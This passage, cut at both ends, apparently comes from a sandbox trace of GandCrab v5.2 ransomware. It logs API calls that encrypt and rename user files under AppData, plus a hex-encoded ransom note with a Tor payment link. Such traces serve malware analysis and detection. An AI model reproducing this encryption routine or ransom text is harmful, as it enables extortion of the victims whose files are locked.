lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", lpString2="KRAB-DECRYPT.html") returned 1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", lpString2="CRAB-DECRYPT.html") returned 1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", lpString2="ntldr") returned 1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", lpString2="NTDETECT.COM") returned 1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", lpString2="Bootfont.bin") returned 1 [0073.246] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0073.246] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.246] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0073.246] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.246] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.247] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.247] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.247] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.247] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0073.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.247] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.247] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.248] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.248] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.248] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.248] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.248] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0073.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.249] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.249] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.249] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.249] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503738) returned 1 [0073.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.250] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.250] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.250] GetLastError () returned 0x0 [0073.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.250] CryptDestroyKey (hKey=0x503738) returned 1 [0073.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.251] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.251] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.251] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034b8) returned 1 [0073.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.252] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.252] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.252] GetLastError () returned 0x0 [0073.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.252] CryptDestroyKey (hKey=0x5034b8) returned 1 [0073.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.252] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.252] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.252] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.253] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0x4c, lpOverlapped=0x0) returned 1 [0073.264] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffffb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.265] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0x4c, lpOverlapped=0x0) returned 1 [0073.266] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.266] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0073.268] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.272] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.272] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.272] CloseHandle (hObject=0x2c4) returned 1 [0073.273] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\synchist"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\synchist.titwmvjl"), dwFlags=0x1) returned 1 [0073.274] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.274] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.274] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.274] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.275] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\TITWMVJL-DECRYPT.txt" [0073.275] lstrlenW (lpString=".titwmvjl") returned 9 [0073.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\TITWMVJL-DECRYPT.txt") returned 76 [0073.275] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.275] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 85 [0073.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\TITWMVJL-DECRYPT.txt") returned 76 [0073.275] lstrlenW (lpString=".txt") returned 4 [0073.275] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.275] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.275] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.275] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\TITWMVJL-DECRYPT.txt") returned 76 [0073.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\TITWMVJL-DECRYPT.txt") returned 76 [0073.275] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.275] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.275] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.275] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.275] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.275] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.275] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.275] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.275] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.276] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0073.276] FindClose (in: hFindFile=0x503478 | out: hFindFile=0x503478) returned 1 [0073.276] CloseHandle (hObject=0x2bc) returned 1 [0073.277] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0073.277] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0073.277] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0073.277] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher" [0073.277] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\" [0073.277] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.277] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.277] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.278] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.278] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.278] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.278] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.278] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.278] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\\\TITWMVJL-DECRYPT.txt") returned 79 [0073.278] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0073.279] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a